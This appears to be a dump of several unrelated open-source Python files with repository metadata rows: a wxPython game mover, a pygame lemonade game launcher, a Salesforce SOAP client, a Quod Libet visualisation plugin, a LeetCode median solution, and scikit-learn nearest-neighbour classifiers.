elif event.GetEventObject().GetName() == 'move_to_primary_button':
games = self.right_listbox.GetSelectionsStrings()
self.model.move_games_to_primary(games)
event.Skip()
def on_change_primary_dir_choice(self, event):
# In this case we include a "New directory" button.
dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE)
if dlg.ShowModal() == wx.ID_OK:
self.model.change_primary_path(dlg.GetPath())
# Only destroy a dialog after we're done with it
dlg.Destroy()
def on_change_secondary_dir_choice(self, event):
# In this case we include a "New directory" button.
dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE)
if dlg.ShowModal() == wx.ID_OK:
self.model.change_secondary_path(dlg.GetPath())
# Only destroy a dialog after we're done with it
dlg.Destroy()
def on_frame_close( self, event ):
''' Save window position and size on close'''
self.model.change_window_size(self.GetSize())
self.model.change_window_coords(self.GetPosition())
event.Skip()
#### Broadcast response methods ####
def primary_path_changed(self,message):
self.primary_dir_choice_button.SetLabel(message.data['path'])
self.left_listbox.SetItems(message.data['path_folders'])
def secondary_path_changed(self,message):
self.secondary_dir_choice_button.SetLabel(message.data['path'])
self.right_listbox.SetItems(message.data['path_folders'])
def games_move_to_secondary(self,message):
self.left_listbox.SetItems(message.data['primary_path_folders'])
self.right_listbox.SetItems(message.data['secondary_path_folders'])
# Same method for games_move_to_primary
games_move_to_primary = games_move_to_secondary
def window_size_changed(self,message):
self.SetSize(message.data)
def window_coords_changed(self,message):
self.SetPosition(message.data)
def use_default_window_size(self,message):
self.Fit()
def display_move_dialog(self, message):
'''When model broadcasts games are being moved, creates a file moving (progress) dialog'''
self.progress_dialog = layout.Moving_progress_dialog(self, message.data['initial_path'], message.data['final_path'], message.data['game_names'])
class App(wx.App):
def OnInit(self):
self.frame = Frame(parent=None)
self.frame.Show()
self.SetTopWindow(self.frame)
return True
if __name__ == '__main__':
app = App()
app.MainLoop()
| gpl-2.0 | -7,643,176,816,354,137,000 | 37.320313 | 287 | 0.733741 | false | 3.437281 | false | false | false |
FOSSRIT/lemonade-stand | LemonadeStand.py | 1 | 1785 | #!/usr/bin/env python
from fortuneengine.GameEngine import GameEngine
from LemonadeMain import LemonadeMain
from LemonadeGui import LemonadeGui
from optparse import OptionParser
from pygame import font
parser = OptionParser()
parser.add_option("", "--width", dest="width", help="window width",
metavar="WIDTH", default=1200, type="int")
parser.add_option("", "--height", dest="height", help="window height",
metavar="HEIGHT", default=855, type="int")
parser.add_option("-f", "--font", dest="font", help="font size",
metavar="SIZE", default=36, type="int")
parser.add_option("", "--shopFont", dest="shopFont", help="shop font size",
metavar="SHOPSIZE", default="48", type="int")
parser.add_option("", "--shopNumFont", dest="shopNumFont",
help="shop number font size", metavar="SHOPNUMSIZE",
default="72", type="int")
parser.add_option("", "--menuFont", dest="menuFont", help="menu font",
metavar="MENUFONT", default="90", type="int")
parser.add_option("-d", "--difficulty", dest="difficulty",
help="difficulty level", metavar="DIFFICULTY",
default=0, type="int")
(opts, args) = parser.parse_args()
ge = GameEngine(width=opts.width, height=opts.height, always_draw=False)
ge.add_object('font', font.SysFont(font.get_default_font(), opts.font))
ge.add_object('shopFont', font.SysFont(font.get_default_font(), opts.shopFont))
ge.add_object('shopNumFont', font.SysFont(font.get_default_font(),
opts.shopNumFont))
ge.add_object('menuFont', font.SysFont(font.get_default_font(), opts.menuFont))
ge.add_object('main', LemonadeMain(opts.difficulty))
ge.add_object('gui', LemonadeGui())
ge.start_main_loop()
| gpl-3.0 | 6,978,417,313,381,393,000 | 39.568182 | 79 | 0.648179 | false | 3.506876 | false | true | false |
heroku/python-salesforce-client | salesforce/soap/base.py | 1 | 5676 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import logging
import urlparse
logger = logging.getLogger(__name__)
try:
import suds.client
if suds.__version__ < '0.6':
raise ImportError
except ImportError:
logger.error("The metadata API requires suds-jurko >= 0.6")
exit()
from requests import Session
from requests.adapters import BaseAdapter
from requests.auth import HTTPBasicAuth
from requests.models import Response
from suds import WebFault
from suds.client import Client
from suds.plugin import MessagePlugin
from suds.properties import Unskin
from suds.transport import Transport, TransportError, Reply
class FileAdapter(BaseAdapter):
def send(self, request, **kwargs):
response = Response()
response.headers = {}
response.encoding = 'utf-8' # FIXME: this is a complete guess
response.url = request.url
response.request = request
response.connection = self
try:
response.raw = open(request.url.replace('file://', ''), 'r')
except IOError as e:
response.status_code = 404
return response
response.status_code = 200
return response
def close(self):
pass
class RequestsHttpTransport(Transport):
def __init__(self, session=None, **kwargs):
Transport.__init__(self)
Unskin(self.options).update(kwargs)
self.session = session or Session()
# Suds expects support for local files URIs.
self.session.mount('file://', FileAdapter())
def _call(self, request, method):
headers = dict(self.options.headers)
headers.update(request.headers)
if self.options.username and self.options.password:
auth = HTTPBasicAuth(self.options.username, self.options.password)
else:
auth = None
response = getattr(self.session, method)(request.url,
auth=auth,
data=request.message,
headers=headers,
timeout=self.options.timeout,
proxies=self.options.proxy,
stream=True)
return response
def open(self, request):
return self._call(request, 'get').raw
def send(self, request):
response = self._call(request, 'post')
return Reply(response.status_code, response.headers, response.content)
class SalesforceSoapClientBase(object):
@property
def version(self):
raise NotImplementedError('Subclasses must specify a version.')
@property
def wsdl_path(self):
raise NotImplementedError('Subclasses must specify a wsdl path.')
def __init__(self, client_id, client_secret, domain, access_token,
refresh_token=None, token_updater=None):
# This plugin is needed in order to keep empty complex objects from
        # getting sent in the SOAP payload.
class PrunePlugin(MessagePlugin):
def marshalled(self, context):
context.envelope[1].prune()
wsdl = 'file://{0}'.format(self.wsdl_path)
self.client = Client(wsdl, transport=RequestsHttpTransport(),
plugins=[PrunePlugin()])
self._set_session_header(access_token)
endpoint = 'https://{0}/services/Soap/m/{1}/{2}'.format(
domain,
self.version,
access_token.split('!', 1)[0], # Salesforce org ID
)
self.client.set_options(location=endpoint)
if refresh_token is not None:
from ..rest import SalesforceRestClient
self.rest_client = SalesforceRestClient(client_id, client_secret,
domain,
access_token=access_token,
refresh_token=refresh_token,
token_updater=token_updater)
else:
self.rest_client = None
@staticmethod
def login(wsdl_path, username, password, token):
client = Client('file://{0}'.format(wsdl_path))
response = client.service.login(username, password + token)
return (
response.sessionId,
urlparse.urlparse(response.serverUrl).netloc,
)
def _set_session_header(self, access_token):
session_header = self.client.factory.create('SessionHeader')
session_header.sessionId = access_token
headers = {
'SessionHeader': session_header
}
self.client.set_options(soapheaders=headers)
def _call(self, function_name, args=None, kwargs=None):
args = args or []
kwargs = kwargs or {}
func = getattr(self.client.service, function_name)
# TODO: parse response, return something actually useful
try:
return func(*args, **kwargs)
except WebFault as e:
# Detect whether the failure is due to an invalid session, and if
# possible, try to refresh the access token.
if (hasattr(e, 'fault') and
e.fault.faultcode == 'sf:INVALID_SESSION_ID' and
self.rest_client):
token = self.rest_client._refresh_token()
if token:
self._set_session_header(token['access_token'])
return func(*args, **kwargs)
raise
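# Editor's sketch, not part of the original module: SalesforceSoapClientBase
# leaves `version` and `wsdl_path` abstract (both raise NotImplementedError
# above), so a concrete client would look roughly like the hypothetical
# subclass below. The API version, WSDL path, credentials and the
# 'describeMetadata' call are placeholders, not values taken from this project.
#
#     class MetadataClient(SalesforceSoapClientBase):
#         version = '36.0'                      # assumed API version
#         wsdl_path = '/path/to/metadata.wsdl'  # assumed local WSDL copy
#
#     session_id, domain = SalesforceSoapClientBase.login(
#         MetadataClient.wsdl_path, 'user@example.com', 'password', 'token')
#     client = MetadataClient('client_id', 'client_secret', domain, session_id)
#     result = client._call('describeMetadata', args=[36.0])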
| mit | 1,096,312,723,674,942,000 | 34.037037 | 80 | 0.570825 | false | 4.667763 | false | false | false |
elbeardmorez/quodlibet | quodlibet/quodlibet/ext/events/visualisations.py | 1 | 3329 | # -*- coding: utf-8 -*-
# Copyright 2017 Nick Boultbee
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
import os
import signal
from gi.repository import Gtk
from quodlibet import _
from quodlibet import app
from quodlibet import print_d
from quodlibet import print_w
from quodlibet.plugins import PluginConfig
from quodlibet.plugins.events import EventPlugin
from quodlibet.qltk import Button
from quodlibet.qltk import ErrorMessage
from quodlibet.qltk import Icons
from quodlibet.qltk.entry import UndoEntry
from quodlibet.util import escape
class ProjectM(EventPlugin):
"""Launch external visualisations, e.g. via projectM
Try this first (Ubuntu/Debian):
sudo apt-get install projectm-pulseaudio
"""
_config = PluginConfig(__name__)
PLUGIN_ID = "visualisations"
PLUGIN_NAME = _("Launch Visualisations")
PLUGIN_ICON = Icons.IMAGE_X_GENERIC
PLUGIN_DESC = _("Launch external visualisations.")
DEFAULT_EXEC = 'projectM-pulseaudio'
def __init__(self):
self._pid = None
def enabled(self):
from gi.repository import GLib
print_d("Starting %s" % self.PLUGIN_NAME)
try:
self._pid, fdin, fdout, fderr = GLib.spawn_async(
argv=self.executable.split(),
flags=GLib.SpawnFlags.SEARCH_PATH,
standard_output=True,
standard_input=True)
except GLib.Error as e:
msg = ((_("Couldn't run visualisations using '%s'") + " (%s)") %
(escape(self.executable), escape(e.message)))
ErrorMessage(title=_("Error"), description=msg,
parent=app.window).run()
else:
# self._stdin = os.fdopen(fdin, mode='w')
print_d("Launched with PID: %s" % self._pid)
def disabled(self):
if not self._pid:
return
print_d("Shutting down %s" % self.PLUGIN_NAME)
try:
os.kill(self._pid, signal.SIGTERM)
os.kill(self._pid, signal.SIGKILL)
except Exception as e:
print_w("Couldn't shut down cleanly (%s)" % e)
def PluginPreferences(self, *args):
vbox = Gtk.VBox(spacing=12)
label = Gtk.Label(label=_("Visualiser executable:"))
def edited(widget):
self.executable = widget.get_text()
entry = UndoEntry()
entry.connect('changed', edited)
entry.set_text(self.executable)
hbox = Gtk.HBox(spacing=6)
hbox.pack_start(label, False, False, 0)
hbox.pack_start(entry, True, True, 0)
vbox.pack_start(hbox, True, True, 0)
def refresh_clicked(widget):
self.disabled()
self.enabled()
refresh_button = Button(_("Reload"), Icons.VIEW_REFRESH)
refresh_button.connect('clicked', refresh_clicked)
vbox.pack_start(refresh_button, False, False, 0)
return vbox
@property
def executable(self):
return self._config.get('executable', self.DEFAULT_EXEC)
@executable.setter
def executable(self, value):
self._config.set('executable', value)
| gpl-2.0 | -5,147,228,131,064,625,000 | 31.320388 | 76 | 0.625713 | false | 3.765837 | false | false | false |
daicang/Leetcode-solutions | 004-median-of-two-sorted-arrays.py | 1 | 1417 | #!/usr/bin/python
class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
size = len(nums1) + len(nums2)
if size % 2 == 0:
return (self.getk(nums1[:], nums2[:], size/2)+
self.getk(nums1[:], nums2[:], size/2-1))/2.0
else:
return self.getk(nums1[:], nums2[:], size/2)
def getk(self, a, b, k):
if len(a) > len(b): a, b = b, a
if len(a) <= 2:
b.extend(a)
b.sort()
return b[k]
if not a: return b[k]
if k <= 0: return min(a[0], b[0])
m, n = len(a), len(b)
if (m+n)/2 >= k:
if a[m/2] >= b[n/2]:
return self.getk(a[:m/2+1], b, k)
else:
return self.getk(a, b[:n/2+1], k)
else:
if a[m/2] >= b[n/2]:
return self.getk(a, b[n/2:], k - n/2)
else:
return self.getk(a[m/2:], b, k - m/2)
# def myfunc(a, b, c):
# return a, b, c
# print myfunc(1, 2, 4/3)
a = [1, 2, 3, 4, 5]
b = [3, 5, 6, 7]
c = []
d = [1]
e = [2, 3, 4, 5, 7, 8, 9, 10, 11, 13, 17, 54, 83]
f = [1, 6, 9, 22, 45, 103, 255, 1024]
g = [1, 2, 2]
h = [1, 2, 3]
s = Solution()
print s.findMedianSortedArrays(a, b)
print s.findMedianSortedArrays(c, d)
print s.findMedianSortedArrays(e, f)
print s.findMedianSortedArrays(g, h)
| mit | -7,180,720,171,993,316,000 | 27.918367 | 64 | 0.440367 | false | 2.604779 | false | false | false |
bnaul/scikit-learn | sklearn/neighbors/_classification.py | 2 | 23284 | """Nearest Neighbor Classification"""
# Authors: Jake Vanderplas <[email protected]>
# Fabian Pedregosa <[email protected]>
# Alexandre Gramfort <[email protected]>
# Sparseness support by Lars Buitinck
# Multi-output support by Arnaud Joly <[email protected]>
#
# License: BSD 3 clause (C) INRIA, University of Amsterdam
import numpy as np
from scipy import stats
from ..utils.extmath import weighted_mode
from ..utils.validation import _is_arraylike, _num_samples
import warnings
from ._base import _check_weights, _get_weights
from ._base import NeighborsBase, KNeighborsMixin, RadiusNeighborsMixin
from ..base import ClassifierMixin
from ..utils import check_array
from ..utils.validation import _deprecate_positional_args
class KNeighborsClassifier(KNeighborsMixin,
ClassifierMixin,
NeighborsBase):
"""Classifier implementing the k-nearest neighbors vote.
Read more in the :ref:`User Guide <classification>`.
Parameters
----------
n_neighbors : int, default=5
Number of neighbors to use by default for :meth:`kneighbors` queries.
weights : {'uniform', 'distance'} or callable, default='uniform'
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, default=30
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : int, default=2
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : str or callable, default='minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of :class:`DistanceMetric` for a
list of available metrics.
If metric is "precomputed", X is assumed to be a distance matrix and
must be square during fit. X may be a :term:`sparse graph`,
in which case only "nonzero" elements may be considered neighbors.
metric_params : dict, default=None
Additional keyword arguments for the metric function.
n_jobs : int, default=None
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Doesn't affect :meth:`fit` method.
Attributes
----------
classes_ : array of shape (n_classes,)
Class labels known to the classifier
    effective_metric_ : str or callable
The distance metric used. It will be same as the `metric` parameter
or a synonym of it, e.g. 'euclidean' if the `metric` parameter set to
'minkowski' and `p` parameter set to 2.
effective_metric_params_ : dict
Additional keyword arguments for the metric function. For most metrics
will be same with `metric_params` parameter, but may also contain the
`p` parameter value if the `effective_metric_` attribute is set to
'minkowski'.
n_samples_fit_ : int
Number of samples in the fitted data.
outputs_2d_ : bool
        False when `y`'s shape is (n_samples, ) or (n_samples, 1) during fit,
otherwise True.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import KNeighborsClassifier
>>> neigh = KNeighborsClassifier(n_neighbors=3)
>>> neigh.fit(X, y)
KNeighborsClassifier(...)
>>> print(neigh.predict([[1.1]]))
[0]
>>> print(neigh.predict_proba([[0.9]]))
[[0.66666667 0.33333333]]
See also
--------
RadiusNeighborsClassifier
KNeighborsRegressor
RadiusNeighborsRegressor
NearestNeighbors
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
.. warning::
Regarding the Nearest Neighbors algorithms, if it is found that two
neighbors, neighbor `k+1` and `k`, have identical distances
but different labels, the results will depend on the ordering of the
training data.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
@_deprecate_positional_args
def __init__(self, n_neighbors=5, *,
weights='uniform', algorithm='auto', leaf_size=30,
p=2, metric='minkowski', metric_params=None, n_jobs=None,
**kwargs):
super().__init__(
n_neighbors=n_neighbors,
algorithm=algorithm,
leaf_size=leaf_size, metric=metric, p=p,
metric_params=metric_params,
n_jobs=n_jobs, **kwargs)
self.weights = _check_weights(weights)
def fit(self, X, y):
"""Fit the k-nearest neighbors classifier from the training dataset.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features) or \
(n_samples, n_samples) if metric='precomputed'
Training data.
y : {array-like, sparse matrix} of shape (n_samples,) or \
(n_samples, n_outputs)
Target values.
Returns
-------
self : KNeighborsClassifier
The fitted k-nearest neighbors classifier.
"""
return self._fit(X, y)
def predict(self, X):
"""Predict the class labels for the provided data.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : ndarray of shape (n_queries,) or (n_queries, n_outputs)
Class labels for each data sample.
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.kneighbors(X)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
n_outputs = len(classes_)
n_queries = _num_samples(X)
weights = _get_weights(neigh_dist, self.weights)
y_pred = np.empty((n_queries, n_outputs), dtype=classes_[0].dtype)
for k, classes_k in enumerate(classes_):
if weights is None:
mode, _ = stats.mode(_y[neigh_ind, k], axis=1)
else:
mode, _ = weighted_mode(_y[neigh_ind, k], weights, axis=1)
mode = np.asarray(mode.ravel(), dtype=np.intp)
y_pred[:, k] = classes_k.take(mode)
if not self.outputs_2d_:
y_pred = y_pred.ravel()
return y_pred
def predict_proba(self, X):
"""Return probability estimates for the test data X.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
p : ndarray of shape (n_queries, n_classes), or a list of n_outputs
of such arrays if n_outputs > 1.
The class probabilities of the input samples. Classes are ordered
by lexicographic order.
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.kneighbors(X)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
n_queries = _num_samples(X)
weights = _get_weights(neigh_dist, self.weights)
if weights is None:
weights = np.ones_like(neigh_ind)
all_rows = np.arange(X.shape[0])
probabilities = []
for k, classes_k in enumerate(classes_):
pred_labels = _y[:, k][neigh_ind]
proba_k = np.zeros((n_queries, classes_k.size))
# a simple ':' index doesn't work right
for i, idx in enumerate(pred_labels.T): # loop is O(n_neighbors)
proba_k[all_rows, idx] += weights[:, i]
# normalize 'votes' into real [0,1] probabilities
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
probabilities.append(proba_k)
if not self.outputs_2d_:
probabilities = probabilities[0]
return probabilities
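# Editor's note, a sketch that is not part of the original sklearn source: the
# prediction above is a (possibly distance-weighted) neighbor vote normalized
# to sum to one. Reproducing the docstring example of predict_proba by hand,
# with uniform weights:
#
#     >>> import numpy as np
#     >>> neighbor_labels = np.array([0, 0, 1])   # 3-NN of x=0.9 in X=[[0],[1],[2],[3]]
#     >>> votes = np.bincount(neighbor_labels, minlength=2).astype(float)
#     >>> votes / votes.sum()                     # matches [[0.66666667 0.33333333]]
#     array([ 0.66666667,  0.33333333])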
class RadiusNeighborsClassifier(RadiusNeighborsMixin,
ClassifierMixin,
NeighborsBase):
"""Classifier implementing a vote among neighbors within a given radius
Read more in the :ref:`User Guide <classification>`.
Parameters
----------
radius : float, default=1.0
Range of parameter space to use by default for :meth:`radius_neighbors`
queries.
weights : {'uniform', 'distance'} or callable, default='uniform'
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, default=30
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : int, default=2
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : str or callable, default='minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of :class:`DistanceMetric` for a
list of available metrics.
If metric is "precomputed", X is assumed to be a distance matrix and
must be square during fit. X may be a :term:`sparse graph`,
in which case only "nonzero" elements may be considered neighbors.
outlier_label : {manual label, 'most_frequent'}, default=None
label for outlier samples (samples with no neighbors in given radius).
- manual label: str or int label (should be the same type as y)
or list of manual labels if multi-output is used.
- 'most_frequent' : assign the most frequent label of y to outliers.
- None : when any outlier is detected, ValueError will be raised.
metric_params : dict, default=None
Additional keyword arguments for the metric function.
n_jobs : int, default=None
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Attributes
----------
classes_ : ndarray of shape (n_classes,)
Class labels known to the classifier.
effective_metric_ : str or callable
The distance metric used. It will be same as the `metric` parameter
or a synonym of it, e.g. 'euclidean' if the `metric` parameter set to
'minkowski' and `p` parameter set to 2.
effective_metric_params_ : dict
Additional keyword arguments for the metric function. For most metrics
will be same with `metric_params` parameter, but may also contain the
`p` parameter value if the `effective_metric_` attribute is set to
'minkowski'.
n_samples_fit_ : int
Number of samples in the fitted data.
outlier_label_ : int or array-like of shape (n_class,)
Label which is given for outlier samples (samples with no neighbors
on given radius).
outputs_2d_ : bool
        False when `y`'s shape is (n_samples, ) or (n_samples, 1) during fit,
otherwise True.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import RadiusNeighborsClassifier
>>> neigh = RadiusNeighborsClassifier(radius=1.0)
>>> neigh.fit(X, y)
RadiusNeighborsClassifier(...)
>>> print(neigh.predict([[1.5]]))
[0]
>>> print(neigh.predict_proba([[1.0]]))
[[0.66666667 0.33333333]]
See also
--------
KNeighborsClassifier
RadiusNeighborsRegressor
KNeighborsRegressor
NearestNeighbors
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
@_deprecate_positional_args
def __init__(self, radius=1.0, *, weights='uniform',
algorithm='auto', leaf_size=30, p=2, metric='minkowski',
outlier_label=None, metric_params=None, n_jobs=None,
**kwargs):
super().__init__(
radius=radius,
algorithm=algorithm,
leaf_size=leaf_size,
metric=metric, p=p, metric_params=metric_params,
n_jobs=n_jobs, **kwargs)
self.weights = _check_weights(weights)
self.outlier_label = outlier_label
def fit(self, X, y):
"""Fit the radius neighbors classifier from the training dataset.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features) or \
(n_samples, n_samples) if metric='precomputed'
Training data.
y : {array-like, sparse matrix} of shape (n_samples,) or \
(n_samples, n_outputs)
Target values.
Returns
-------
self : RadiusNeighborsClassifier
The fitted radius neighbors classifier.
"""
self._fit(X, y)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
if self.outlier_label is None:
outlier_label_ = None
elif self.outlier_label == 'most_frequent':
outlier_label_ = []
# iterate over multi-output, get the most frequent label for each
# output.
for k, classes_k in enumerate(classes_):
label_count = np.bincount(_y[:, k])
outlier_label_.append(classes_k[label_count.argmax()])
else:
if (_is_arraylike(self.outlier_label) and
not isinstance(self.outlier_label, str)):
if len(self.outlier_label) != len(classes_):
raise ValueError("The length of outlier_label: {} is "
"inconsistent with the output "
"length: {}".format(self.outlier_label,
len(classes_)))
outlier_label_ = self.outlier_label
else:
outlier_label_ = [self.outlier_label] * len(classes_)
for classes, label in zip(classes_, outlier_label_):
if (_is_arraylike(label) and
not isinstance(label, str)):
                    # ensure the outlier label for each output is a scalar.
raise TypeError("The outlier_label of classes {} is "
"supposed to be a scalar, got "
"{}.".format(classes, label))
if np.append(classes, label).dtype != classes.dtype:
# ensure the dtype of outlier label is consistent with y.
raise TypeError("The dtype of outlier_label {} is "
"inconsistent with classes {} in "
"y.".format(label, classes))
self.outlier_label_ = outlier_label_
return self
def predict(self, X):
"""Predict the class labels for the provided data.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : ndarray of shape (n_queries,) or (n_queries, n_outputs)
Class labels for each data sample.
"""
probs = self.predict_proba(X)
classes_ = self.classes_
if not self.outputs_2d_:
probs = [probs]
classes_ = [self.classes_]
n_outputs = len(classes_)
n_queries = probs[0].shape[0]
y_pred = np.empty((n_queries, n_outputs), dtype=classes_[0].dtype)
for k, prob in enumerate(probs):
# iterate over multi-output, assign labels based on probabilities
# of each output.
max_prob_index = prob.argmax(axis=1)
y_pred[:, k] = classes_[k].take(max_prob_index)
outlier_zero_probs = (prob == 0).all(axis=1)
if outlier_zero_probs.any():
zero_prob_index = np.flatnonzero(outlier_zero_probs)
y_pred[zero_prob_index, k] = self.outlier_label_[k]
if not self.outputs_2d_:
y_pred = y_pred.ravel()
return y_pred
def predict_proba(self, X):
"""Return probability estimates for the test data X.
Parameters
----------
X : array-like of shape (n_queries, n_features), \
or (n_queries, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
p : ndarray of shape (n_queries, n_classes), or a list of n_outputs
of such arrays if n_outputs > 1.
The class probabilities of the input samples. Classes are ordered
by lexicographic order.
"""
X = check_array(X, accept_sparse='csr')
n_queries = _num_samples(X)
neigh_dist, neigh_ind = self.radius_neighbors(X)
outlier_mask = np.zeros(n_queries, dtype=bool)
outlier_mask[:] = [len(nind) == 0 for nind in neigh_ind]
outliers = np.flatnonzero(outlier_mask)
inliers = np.flatnonzero(~outlier_mask)
classes_ = self.classes_
_y = self._y
if not self.outputs_2d_:
_y = self._y.reshape((-1, 1))
classes_ = [self.classes_]
if self.outlier_label_ is None and outliers.size > 0:
raise ValueError('No neighbors found for test samples %r, '
'you can try using larger radius, '
'giving a label for outliers, '
'or considering removing them from your dataset.'
% outliers)
weights = _get_weights(neigh_dist, self.weights)
if weights is not None:
weights = weights[inliers]
probabilities = []
# iterate over multi-output, measure probabilities of the k-th output.
for k, classes_k in enumerate(classes_):
pred_labels = np.zeros(len(neigh_ind), dtype=object)
pred_labels[:] = [_y[ind, k] for ind in neigh_ind]
proba_k = np.zeros((n_queries, classes_k.size))
proba_inl = np.zeros((len(inliers), classes_k.size))
# samples have different size of neighbors within the same radius
if weights is None:
for i, idx in enumerate(pred_labels[inliers]):
proba_inl[i, :] = np.bincount(idx,
minlength=classes_k.size)
else:
for i, idx in enumerate(pred_labels[inliers]):
proba_inl[i, :] = np.bincount(idx,
weights[i],
minlength=classes_k.size)
proba_k[inliers, :] = proba_inl
if outliers.size > 0:
_outlier_label = self.outlier_label_[k]
label_index = np.flatnonzero(classes_k == _outlier_label)
if label_index.size == 1:
proba_k[outliers, label_index[0]] = 1.0
else:
warnings.warn('Outlier label {} is not in training '
'classes. All class probabilities of '
'outliers will be assigned with 0.'
''.format(self.outlier_label_[k]))
# normalize 'votes' into real [0,1] probabilities
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
probabilities.append(proba_k)
if not self.outputs_2d_:
probabilities = probabilities[0]
return probabilities
| bsd-3-clause | 5,520,555,482,386,144,000 | 36.798701 | 79 | 0.577478 | false | 4.180251 | false | false | false |
BayanGroup/sentry | src/sentry/web/frontend/remove_project.py | 1 | 1378 | from __future__ import absolute_import
from django import forms
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _
from sentry.api import client
from sentry.models import OrganizationMemberType
from sentry.web.frontend.base import ProjectView
class RemoveProjectForm(forms.Form):
pass
class RemoveProjectView(ProjectView):
required_access = OrganizationMemberType.OWNER
sudo_required = True
def get_form(self, request):
if request.method == 'POST':
return RemoveProjectForm(request.POST)
return RemoveProjectForm()
def handle(self, request, organization, team, project):
form = self.get_form(request)
if form.is_valid():
client.delete('/projects/{}/{}/'.format(organization.slug, project.slug),
request.user, is_sudo=True)
messages.add_message(
request, messages.SUCCESS,
_(u'The project %r was scheduled for deletion.') % (project.name.encode('utf-8'),))
return HttpResponseRedirect(reverse('sentry-organization-home', args=[team.organization.slug]))
context = {
'form': form,
}
return self.respond('sentry/projects/remove.html', context)
| bsd-3-clause | 7,260,892,795,162,825,000 | 30.318182 | 107 | 0.674891 | false | 4.518033 | false | false | false |
eickenberg/scikit-learn | sklearn/cluster/bicluster/spectral.py | 1 | 19540 | """Implements spectral biclustering algorithms.
Authors : Kemal Eren
License: BSD 3 clause
"""
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import dia_matrix
from scipy.sparse import issparse
from sklearn.base import BaseEstimator, BiclusterMixin
from sklearn.externals import six
from sklearn.utils.arpack import svds
from sklearn.utils.arpack import eigsh
from sklearn.cluster import KMeans
from sklearn.cluster import MiniBatchKMeans
from sklearn.utils.extmath import randomized_svd
